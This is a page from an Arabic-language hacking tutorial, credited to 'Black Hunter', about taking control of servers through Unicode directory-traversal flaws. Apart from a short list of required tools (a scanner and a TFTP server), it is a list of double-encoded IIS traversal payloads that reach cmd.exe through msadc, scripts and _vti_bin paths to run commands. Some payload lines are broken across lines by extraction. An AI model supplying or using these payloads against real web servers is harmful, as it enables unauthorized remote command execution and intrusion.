Page 137 - بسم الله الرحمن الرحيم

P. 137

<‫>منقول‬
<‫ بلك هنتر‬:‫>الكاتب‬

‫الموضوع يتكلم عن اساليب التحكم في السيرفر عبر اليونيكود مع بعض المتطلبات‬

: ‫الدوات المطلوبه‬

‫( اداة مسح ثغرات يونيكود‬1
TFTPD ‫( برنامج سيرفر‬2

‫( معرفة جهيده باليونيكود‬3
=================================================
=================================================

‫( بأمكانك الحصول على ثغرات اليونيكود من العديد من المواقع او من موقعي‬1
/http://www.devil2k.com
(( ‫وهذه مهداه مني انا )) بلك هنتر‬

\:msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c/
msadc/../

%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/
\:c+dir+c

msadc/..%255c..%255c..%255c../
\:%255cwinnt/system32/cmd.exe?/c+dir+c

msadc/../
%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/c

\:md.exe?/c+dir+c
\:scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c /
\:scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c/
\:msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c/

msadc/..%%35c../..%%35c../..%/
\:%35c../winnt/system32/cmd.exe?/c+dir+c

msadc/..%%35%63../..%%35%63../..%/
\:%35%63../winnt/system32/cmd.exe?/c+dir+c

msadc/../
%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/

\:c+dir+c
MSADC/..%255c..%255c..%255c../
\:%255cwinnt/system32/cmd.exe?/c+dir+c
MSADC/..%%35c..%%35c..%%35c..%/
\:%35cwinnt/system32/cmd.exe?/c+dir+c
MSADC/..%%35%63..%%35%63..%%35%63..%/
\:%35%63winnt/system32/cmd.exe?/c+dir+c

MSADC/../
%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/c

\:md.exe?/c+dir+c
vti_bin/..%255c..%255c..%255c..%255c.._/
\:%255c../winnt/system32/cmd.exe?/c+dir+c
vti_bin/..%%35c..%%35c..%%35c..%%35c..%_/
\:%35c../winnt/system32/cmd.exe?/c+dir+c
vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%_/
\:%35%63../winnt/system32/cmd.exe?/c+dir+c

137

132 133 134 135 136 137 138 139 140 141 142